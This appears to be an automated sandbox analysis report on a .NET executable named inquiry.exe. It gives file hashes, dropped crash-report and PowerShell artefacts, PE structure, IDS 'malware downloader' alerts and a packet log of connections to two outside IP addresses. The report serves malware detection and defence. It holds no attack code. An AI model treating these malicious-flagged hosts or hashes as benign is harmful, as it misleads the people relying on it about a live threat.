                                                        Entropy (8bit):1.1468057182655782
                                                        Encrypted:false
                                                        SSDEEP:192:dZyYY9ojv0UnUFaWBUU/CEibdzuiFKZ24lO8R:OPojcUnUFamUHZzuiFKY4lO8R
                                                        MD5:B5F9071CAE004F69193483B7D4757186
                                                        SHA1:543F739F3D4C3D0974C383EF0E52D89CD6808C8F
                                                        SHA-256:67664094D64EC627CA0A8669055FE9CB7BCE5042899798FC1985DBCA77991FA0
                                                        SHA-512:6311C6F67902AF683AB59AE01083EDF00C098CC6F6AE0EA71B29C43720EF795402EF79F70AFBAD859A43D7F20361C7078761FB9CCAE0C079379A9FB6C28B3CE6
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.5.6.6.2.1.2.8.9.3.3.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.5.6.6.2.2.1.7.9.9.6.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.b.a.e.5.9.1.-.e.6.9.3.-.4.c.4.a.-.b.c.4.a.-.4.9.8.c.1.f.3.d.c.e.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.a.7.4.2.d.1.-.0.3.7.7.-.4.b.8.4.-.b.3.5.f.-.c.6.5.c.b.c.0.9.5.0.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.i.n.q.u.i.r.y...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.r.a.n.s.p.o.n.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.c.-.0.0.0.1.-.0.0.1.4.-.e.9.9.4.-.f.8.f.e.6.a.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.8.7.8.5.3.e.9.0.f.6.0.5.6.a.0.6.1.c.8.9.8.f.b.9.d.3.d.a.1.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.1.1.9.7.c.4.c.b.5.7.1.2.0.1.1.6.4.a.f.8.e.2.f.9.8.f.7.8.7.b.e.1.8.9.c.9.a.a.6.3.!.i.n.q.u.i.r.y...e.x.e.
                                                        Process:C:\Windows\System32\WerFault.exe
                                                        File Type:Mini DuMP crash report, 16 streams, Wed Sep 25 16:50:21 2024, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):463621
                                                        Entropy (8bit):3.253260779488554
                                                        Encrypted:false
                                                        SSDEEP:3072:YmTnAWie4FylHMWzrREEhT4KcF/VcSyllnYXvoO+L1CCqa8jpN3+vAMK895cJ:Ykpie/TXO1Yn51qak3QAMK8i
                                                        MD5:45D1D5F3038E8726A68BCB8623069F6F
                                                        SHA1:12AEF31DCB71A01304401B1D965F8B5F6F82FF0E
                                                        SHA-256:86AD349D22745BF7CF043C8CEFD25FCB19806CBE1D4B5BB0A2E3DD541B1BDD41
                                                        SHA-512:14BC82A5A9E5829CB42B58ACC330D8375EEE636724A2FBB37EB9348D0713888346F45708B2FA843A06AD54C6E3B3A23DA705EE84EB9CC38E40BF639F1FC75CED
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:MDMP..a..... .......M?.f............t...........p...........$....%......0...(%.......J..............l.......8...........T...........(8..............XB..........DD..............................................................................eJ.......D......Lw......................T...........G?.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8588
                                                        Entropy (8bit):3.706138253550577
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJYof76X6YNA5r/Igmfgq8prL89bR6BfoX7m:R6lXJvz6X6YKFggmfgqFRsfb
                                                        MD5:761618DCBC4F79A526A84E4DD1655A3A
                                                        SHA1:BF707A37ECC5E50DA17B67E72CAC76EED0F83957
                                                        SHA-256:0BB44A334F5463887C0DAE913E1BB20EC9AA47909B64A16B4C92B2B6A12081DE
                                                        SHA-512:C6970067464A86D5402EBCCBD9F4855D4D9696B893ACEB9669C2C0EFE0DA0F125A51FFE82E45AA1AE2D980147B370B9B6A65DD416B50D1BBB837060C4BF3AD24
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.4.0.<./.P.i.
                                                        Process:C:\Windows\System32\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4748
                                                        Entropy (8bit):4.501164363166042
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zsaJg771I9ReWpW8VYj4Ym8M4JuUAF44qyq853Qcz9Lf7d:uIjfoI7Of7VYJuvqpc5Lf7d
                                                        MD5:9D58AFD828CEA8026415BAC13FE90BEF
                                                        SHA1:6A2330A1920449A83878E345F6418DA47C735AD1
                                                        SHA-256:A2B6A0C287BC1583863C82CFF1B451048A53046297CD180889F6E2CF7CEBC3E2
                                                        SHA-512:7E3664D1D67B3DA7F09B5AAE722B64BEFEEE3C9F6346DD380186EC86435C1E64F2CA2E1719241CA4121BCDAA7FB4BB63BCD513F2B53CB380A31B0DF5B420DD44
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515993" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                        MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                        SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                        SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                        SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:@...e................................................@..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WerFault.exe
                                                        File Type:MS Windows registry file, NT/2000 or above
                                                        Category:dropped
                                                        Size (bytes):1835008
                                                        Entropy (8bit):4.416709091714586
                                                        Encrypted:false
                                                        SSDEEP:6144:ocifpi6ceLPL9skLmb0mBSWSPtaJG8nAgex285i2MMhA20X4WABlGuNx5+:di58BSWIZBk2MM6AFBLo
                                                        MD5:83BC5390EED194D5479BF913E12BC90A
                                                        SHA1:01C62B0E0F9DDA04760FAC94251950FF7C27E035
                                                        SHA-256:29333C5735A47541207210708FD5FDB5E3B03FEBDA82F63ED3659A33B48D4351
                                                        SHA-512:1FA0512D6727A3FDF8B16CE4030116CDE32E790D861FE5FAC36863D85164FC386BBFCD9D13DFF8AC9399D8BBDD294EF96AC613467FE3AFA6CB4A752E41A4CFB4
                                                        Malicious:false
                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.d..k...............................................................................................................................................................................................................................................................................................................................................g..5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.703644365642738
                                                        TrID:
                                                        • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                        • Win64 Executable GUI (202006/5) 46.43%
                                                        • Win64 Executable (generic) (12005/4) 2.76%
                                                        • Generic Win/DOS Executable (2004/3) 0.46%
                                                        • DOS Executable Generic (2002/1) 0.46%
                                                        File name:inquiry.exe
                                                        File size:1'399'327 bytes
                                                        MD5:e645b187588a20e886416884000446db
                                                        SHA1:1197c4cb571201164af8e2f98f787be189c9aa63
                                                        SHA256:32bb184d40c1cd31619acef73c72cff265023617438eedc0890da62b50f6ff98
                                                        SHA512:7fcd283afbf2cc2d505b80decc18ad9fe1cdeef2fbd8edd223c957a7ada6e76090ee4743023f84c50453b858b565bd28ba739f6c440bd56c57c316fd0b0e26b4
                                                        SSDEEP:24576:ZOSVcy0SVP2ABoxNwmV3p3PWTkhPV6UNqXCosA:ISumstwsYplsA
                                                        TLSH:C5556981B4174CA3FC196236D4DAB8F214FE2D6B76F0195FDF857E1205B213E026A63A
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..f.........."...0..8............... ....@...... ..............................gD....`................................
                                                        Icon Hash:612541121a4a4d8e
                                                        Entrypoint:0x400000
                                                        Entrypoint Section:
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66F2A468 [Tue Sep 24 11:37:12 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:
                                                        Instruction
                                                        dec ebp
                                                        pop edx
                                                        nop
                                                        add byte ptr [ebx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+eax], al
                                                        add byte ptr [eax], al
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x37fa6.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x38b00x3a00bf38fc89b1845420625a941251891e9eFalse0.6383351293103449data6.222935935104772IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x60000x37fa60x38000e1636d6550623f717217d6530f169460False0.5250723702566964data6.1935844883912505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x62c40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 7559 x 7559 px/m0.6400709219858156
                                                        RT_ICON0x672c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 7559 x 7559 px/m0.5733606557377049
                                                        RT_ICON0x70b40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 7559 x 7559 px/m0.5199343339587242
                                                        RT_ICON0x815c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 7559 x 7559 px/m0.4464730290456432
                                                        RT_ICON0xa7040x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 7559 x 7559 px/m0.3911195087387813
                                                        RT_ICON0xe92c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 7559 x 7559 px/m0.3689463955637708
                                                        RT_ICON0x13db40x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 7559 x 7559 px/m0.32725457220937565
                                                        RT_ICON0x1d25c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 7559 x 7559 px/m0.2950579675854726
                                                        RT_ICON0x2da840xff51PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9867811080001836
                                                        RT_GROUP_ICON0x3d9d80x84data0.7196969696969697
                                                        RT_VERSION0x3da5c0x360data0.41087962962962965
                                                        RT_MANIFEST0x3ddbc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-09-25T18:50:26.489574+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749700158.101.44.24280TCP
                                                        2024-09-25T18:50:27.715748+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749700158.101.44.24280TCP
                                                        2024-09-25T18:50:28.336191+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749707188.114.96.3443TCP
                                                        2024-09-25T18:50:29.129943+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749708158.101.44.24280TCP
                                                        2024-09-25T18:50:29.699751+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749709188.114.96.3443TCP
                                                        2024-09-25T18:50:30.364603+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749710158.101.44.24280TCP
                                                        2024-09-25T18:50:30.954344+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749711188.114.96.3443TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 25, 2024 18:50:12.145860910 CEST49671443192.168.2.7204.79.197.203
                                                        Sep 25, 2024 18:50:14.161592960 CEST49674443192.168.2.7104.98.116.138
                                                        Sep 25, 2024 18:50:14.161619902 CEST49675443192.168.2.7104.98.116.138
                                                        Sep 25, 2024 18:50:14.302109957 CEST49672443192.168.2.7104.98.116.138
                                                        Sep 25, 2024 18:50:16.161919117 CEST49677443192.168.2.720.50.201.200
                                                        Sep 25, 2024 18:50:16.536396980 CEST49677443192.168.2.720.50.201.200
                                                        Sep 25, 2024 18:50:16.958293915 CEST49671443192.168.2.7204.79.197.203
                                                        Sep 25, 2024 18:50:17.286554098 CEST49677443192.168.2.720.50.201.200
                                                        Sep 25, 2024 18:50:18.786478996 CEST49677443192.168.2.720.50.201.200
                                                        Sep 25, 2024 18:50:21.770869970 CEST49677443192.168.2.720.50.201.200
                                                        Sep 25, 2024 18:50:22.049386978 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:22.059319973 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:22.059781075 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:22.069665909 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:22.078347921 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:23.786469936 CEST49674443192.168.2.7104.98.116.138
                                                        Sep 25, 2024 18:50:23.786473989 CEST49675443192.168.2.7104.98.116.138
                                                        Sep 25, 2024 18:50:23.973956108 CEST49672443192.168.2.7104.98.116.138
                                                        Sep 25, 2024 18:50:24.270399094 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:24.281910896 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:24.292211056 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:26.325206041 CEST44349699104.98.116.138192.168.2.7
                                                        Sep 25, 2024 18:50:26.325297117 CEST49699443192.168.2.7104.98.116.138
                                                        Sep 25, 2024 18:50:26.331159115 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:26.489573956 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:26.499501944 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:26.499547005 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:26.499613047 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:26.536030054 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:26.536062002 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:26.677072048 CEST49671443192.168.2.7204.79.197.203
                                                        Sep 25, 2024 18:50:27.056118965 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.056210995 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.077224970 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.077255964 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.077694893 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.131668091 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.241390944 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.287400961 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.438679934 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.438777924 CEST44349705188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.439141035 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.493565083 CEST49705443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.495405912 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:27.501319885 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:27.657648087 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:27.665575981 CEST49707443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.665683031 CEST44349707188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.665864944 CEST49707443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.666280985 CEST49707443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:27.666320086 CEST44349707188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:27.715748072 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:27.723957062 CEST49677443192.168.2.720.50.201.200
                                                        Sep 25, 2024 18:50:28.141377926 CEST44349707188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:28.212570906 CEST49707443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:28.212646008 CEST44349707188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:28.336242914 CEST44349707188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:28.336385012 CEST44349707188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:28.336482048 CEST49707443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:28.373481035 CEST49707443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:28.486076117 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:28.496535063 CEST8049700158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:28.496617079 CEST4970080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:28.502996922 CEST4970880192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:28.512176991 CEST8049708158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:28.512274981 CEST4970880192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:28.571722984 CEST4970880192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:28.577394962 CEST8049708158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:29.083614111 CEST8049708158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:29.084872961 CEST49709443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:29.084920883 CEST44349709188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:29.084983110 CEST49709443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:29.085259914 CEST49709443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:29.085270882 CEST44349709188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:29.129942894 CEST4970880192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:29.557893991 CEST44349709188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:29.565093994 CEST49709443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:29.565119982 CEST44349709188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:29.699675083 CEST44349709188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:29.699933052 CEST44349709188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:29.700011015 CEST49709443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:29.700496912 CEST49709443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:29.703779936 CEST4970880192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:29.705538034 CEST4971080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:29.709208965 CEST8049708158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:29.709263086 CEST4970880192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:29.710686922 CEST8049710158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:29.710875034 CEST4971080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:29.710875034 CEST4971080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:29.716016054 CEST8049710158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:30.314979076 CEST8049710158.101.44.242192.168.2.7
                                                        Sep 25, 2024 18:50:30.316358089 CEST49711443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:30.316400051 CEST44349711188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:30.316509008 CEST49711443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:30.316741943 CEST49711443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:30.316754103 CEST44349711188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:30.364603043 CEST4971080192.168.2.7158.101.44.242
                                                        Sep 25, 2024 18:50:30.794281960 CEST44349711188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:30.795767069 CEST49711443192.168.2.7188.114.96.3
                                                        Sep 25, 2024 18:50:30.795799971 CEST44349711188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:30.954201937 CEST44349711188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:30.954298019 CEST44349711188.114.96.3192.168.2.7
                                                        Sep 25, 2024 18:50:30.954391003 CEST49711443192.168.2.7188.114.96.3
